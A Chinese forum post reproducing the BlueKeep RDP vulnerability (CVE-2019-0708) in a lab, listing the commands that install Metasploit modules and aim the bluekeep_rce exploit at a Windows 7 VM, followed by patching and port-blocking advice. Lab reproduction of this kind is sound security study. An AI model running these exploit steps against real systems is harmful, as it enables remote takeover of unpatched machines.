| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 1728 人关注过本帖
标题:CVE-2019-0708漏洞复现(EXP利用)
只看楼主 加入收藏
源哥
Rank: 1
等 级:新手上路
帖 子:15
专家分:0
注 册:2019-9-5
收藏
 问题点数:0 回复次数:0 
CVE-2019-0708漏洞复现(EXP利用)
2019年5月15号Windows发布补丁,该补丁修复了远程桌面中存在的远程代码执行漏洞CVE-2019-0708,该漏洞通过检查用户的身份验证,绕过认证,可直接通过rdp协议进行连接并发送恶意代码。一旦被利用会导致服务器入侵,可造成像WannaCry永恒之蓝漏洞一样大规模的感染。  
2019年9月7日凌晨,metaspolit更新了漏洞利用程序,可远程代码执行获取系统权限。
 
0x01环境
 
      攻击机:kali(192.168.9.128)
      靶机:windows7sp1(192.168.9.132)   
 
kali攻击机下载metasploit攻击脚本,kali中执行以下命令。
wget https://raw.
wget https://
wget https://
wget https://
下载完成后复制脚本到metasploit-framework中,可执行如下命令:
cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb   
cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cp cve_2019_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
 
0x02复现过程
 
1.准备环境
Kali中使用命令:msfconsole进入metasploit中
进入metasploit中使用命令:reload_all加载复制过去的脚本
在metasploit中使用命令:search0708搜索EXP脚本
 
 
2.使用模块
在metasploit中使用命令:            useexploit/windows/rdp/cve_2019_0708_bluekeep_rce加载攻击模
再使用show options查看模块信息
 
 
3.设置参数
设置关键选项RHOSTS/RPORT/TARGET
set rhosts 192.168.9.132
setrport 3389
settarget 3
(因为我们使用的是VMware,所以可以使用target 3)
 
 
4.开始攻击
使用exploit开始攻击,成功建立连接。
 
0x03修复建议
    CVE-2019-0708漏洞修复补丁以及安全建议
有些windows2008系统打不了补丁的一般是数据中心版本,可以设置一下服务器,计算机右键属性-远程设置-仅允许运行使用网络基本身份验证的远程桌面的计算机连接(更安全)(N),在这行点勾,然后确认即可,可以临时的防止漏洞的攻击。
如果对补丁不知道该如何修复的,可以启用阿里云的端口安全策略,禁止掉3389远程端口,只允许自己的IP通信即可。
1.Windows Server 2008 漏洞补丁系列下载地址
Windows Server 2008 32位系统:
http://download.
Windows Server 2008 x64位系统:
http://download.
Windows Server 2008 R2Itanium系统:
http://download.
Windows Server 2008 R2 x64系统:
http://download.
Windows Server 2008Itanium:
http://download.
2.Windows Server 2003 漏洞补丁系列下载地址
Windows Server 2003 32位系统:
http://download.
Windows Server 2003 64位系统:
http://download.
3. Windows XP 漏洞补丁系列下载地址
Windows XP SP3 32位系统:
http://download.
Windows XP SP2 64位系统:
http://download.
Windows XP SP3 for XPe:
http://download.
搜索更多相关主题的帖子: windows 系统 http 漏洞 com 
2019-09-09 17:40
快速回复:CVE-2019-0708漏洞复现(EXP利用)
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.022159 second(s), 8 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved